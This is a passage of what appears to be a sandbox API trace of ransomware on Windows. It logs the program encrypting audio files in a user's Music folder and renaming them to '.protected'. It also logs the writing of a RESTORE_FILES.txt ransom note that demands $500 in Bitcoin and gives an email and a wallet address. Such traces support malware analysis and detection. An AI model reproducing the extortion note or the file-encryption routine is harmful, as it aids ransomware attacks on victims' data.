HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\s_y9kcvvsjectmdtce.m4a.protected")) returned 1 [0092.349] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="Windows") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="Program Files") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="Program Files (x86)") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="$Recycle.bin") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="System Volume Information") returned 1 [0092.349] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrIW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".protected") returned 0x0 [0092.349] lstrcmpW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0092.349] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.349] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\yzniriaooo txdjup.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.349] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".txt") returned 0x0 [0092.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".rar") returned 0x0 [0092.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".zip") returned 0x0 [0092.349] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.350] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.350] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.350] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.350] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.350] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.350] CloseHandle (hObject=0xd8) returned 1 [0092.351] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3.protected") returned 104 [0092.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\yzniriaooo txdjup.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\yzniriaooo txdjup.mp3.protected")) returned 1 [0092.351] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.351] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.352] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\RESTORE_FILES.txt") returned 90 [0092.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.352] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.352] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.353] lstrlenA (lpString="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") returned 684 [0092.353] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.353] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.353] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0092.353] CloseHandle (hObject=0xd4) returned 1 [0092.354] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="Windows") returned -1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="Program Files") returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="Program Files (x86)") returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="$Recycle.bin") returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="System Volume Information") returned -1 [0092.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrIW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".protected") returned 0x0 [0092.354] lstrcmpW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\rq-vk_eecyz60jbhqb_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".txt") returned 
0x0 [0092.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".rar") returned 0x0 [0092.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".zip") returned 0x0 [0092.355] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.355] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.355] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.356] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.356] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.356] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.356] CloseHandle (hObject=0xd4) returned 1 [0092.360] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav.protected") returned 91 [0092.360] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\rq-vk_eecyz60jbhqb_.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\rq-vk_eecyz60jbhqb_.wav.protected")) returned 1 [0092.361] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="Windows") returned -1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="Program Files") returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="Program Files (x86)") returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="$Recycle.bin") returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="System Volume Information") returned 1 [0092.361] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrIW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".protected") returned 0x0 [0092.361] lstrcmpW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.361] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.361] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\music\\kbpzp-b4rdx-rknrq\\tibvjxvcls9jt8manmrr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".txt") returned 0x0 [0092.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".rar") returned 0x0 [0092.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".zip") returned 0x0 [0092.362] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.362] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.362] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.363] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.363] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.363] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.363] CloseHandle (hObject=0xd4) returned 1 [0092.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav.protected") returned 92 [0092.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\tibvjxvcls9jt8manmrr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\tibvjxvcls9jt8manmrr.wav.protected")) returned 1 [0092.365] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="Windows") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="Program Files") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="Program Files (x86)") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="$Recycle.bin") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="System Volume Information") returned 1 [0092.365] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrIW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".protected") returned 0x0 [0092.365] lstrcmpW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.365] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.365] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\xi29xn5dxsvihvkobv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".txt") returned 0x0 [0092.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".rar") returned 0x0 [0092.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".zip") returned 0x0 [0092.365] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.366] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0092.367] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.367] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.367] CloseHandle (hObject=0xd4) returned 1 [0092.367] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav.protected") returned 90 [0092.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\xi29xn5dxsvihvkobv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\xi29xn5dxsvihvkobv.wav.protected")) returned 1 [0092.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="Windows") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="Program Files") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="Program Files (x86)") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="$Recycle.bin") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="System Volume Information") returned 1 [0092.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.368] StrStrIW (lpFirst="z9JVlpIKm.wav", 
lpSrch=".protected") returned 0x0 [0092.368] lstrcmpW (lpString1="z9JVlpIKm.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.368] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.368] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\z9jvlpikm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.369] StrStrW (lpFirst="z9JVlpIKm.wav", lpSrch=".txt") returned 0x0 [0092.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.369] StrStrW (lpFirst="z9JVlpIKm.wav", lpSrch=".rar") returned 0x0 